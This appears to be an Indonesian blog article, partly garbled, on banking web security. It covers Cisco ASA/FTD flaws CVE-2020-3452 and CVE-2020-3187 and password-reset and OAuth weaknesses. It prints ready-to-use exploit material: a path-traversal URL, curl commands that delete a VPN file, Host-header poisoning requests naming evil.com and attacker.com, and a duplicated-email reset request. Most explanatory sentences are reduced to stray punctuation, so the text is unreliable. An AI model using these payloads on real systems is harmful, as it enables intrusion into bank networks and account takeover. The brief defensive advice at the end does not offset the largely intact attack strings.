Clever Geek Handbook

Masalah keamanan perbankan online

Halo teman teman!





Hari ini kita akan berbicara tentang masalah mendesak dari keamanan sistem perbankan, kami akan menganalisis kerentanan umum dan menarik kesimpulan berdasarkan masalah saat ini.





Penting

Sekali lagi, penulis tidak menjamin untuk menunjukkan kepada Anda bagaimana melindungi sistem Anda sepenuhnya dari ancaman dunia maya, hanya ingin menunjukkan masalah apa yang harus Anda perhatikan.





1. Layanan SSL VPN

Bank sangat sering menggunakan layanan Cisco SSL VPN untuk mengatur akses jarak jauh ke jaringan internal mereka





, .. Cisco CVE-2020-3452 CVE-2020-3187





1.1. CVE-2020-3452

CVE-2020-3452 - Cisco ASA FTD. , , , HTTP- .









https://bank.com/+CSCOT+/translation-table?type=mst&textdomain=/%252bCSCOE%252b/portal_inc.lua&default-language&lang=../









, .





1.2. CVE-2020-3187





/session_password.html 200





curl -k -s -i https://



Cisco-VPN/+CSCOE+/session_password.html







200? -





"/+CSCOU+/csco_logo.gif"







curl -k -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://



Cisco-VPN/+CSCOE+/session_password.html







VPN .





2. & OAuth

- (SSO) OAuth 2.0, , , .





GET /auth/sso/cb?code=[sso token account] HTTP/1.1

Host: bank.com

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8

Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close









CSRF . - .





  1. SSO





  2. SSO ,





  3. .





  4. SSO .





redirect_uri - url . / .









POST https://bank.com/reset.php HTTP/1.1

Accept: /

Content-Type: application/json

Host: evil.com











Host: bank.com

X-Forwarded-Host: attacker.com











Host: target.com

Host: attacker.com







email .









https://evil.com/reset-password.php?token=12345678-1234-1234-1234-12345678901





- . , .





.





POST /resetPassword

[…]

email=victim@email.com&email=attacker@email.com







Dalam permintaan tersebut, Anda dapat melihat bahwa penyerang hanya menduplikasi parameter email dan menunjukkan emailnya yang akan dikirimi token otorisasi.





Keluaran

Selalu perbarui layanan Anda, baik itu SSL VPN atau GlobalProtect.





Jaga Keamanan Otentikasi





Juga sebagai tip, gunakan Firewall Aplikasi Web (  WAF  ) untuk mencegah eksploitasi kerentanan yang disebabkan oleh perubahan kode.





Semoga berhasil! Semua yang terbaik.







More articles:


All Articles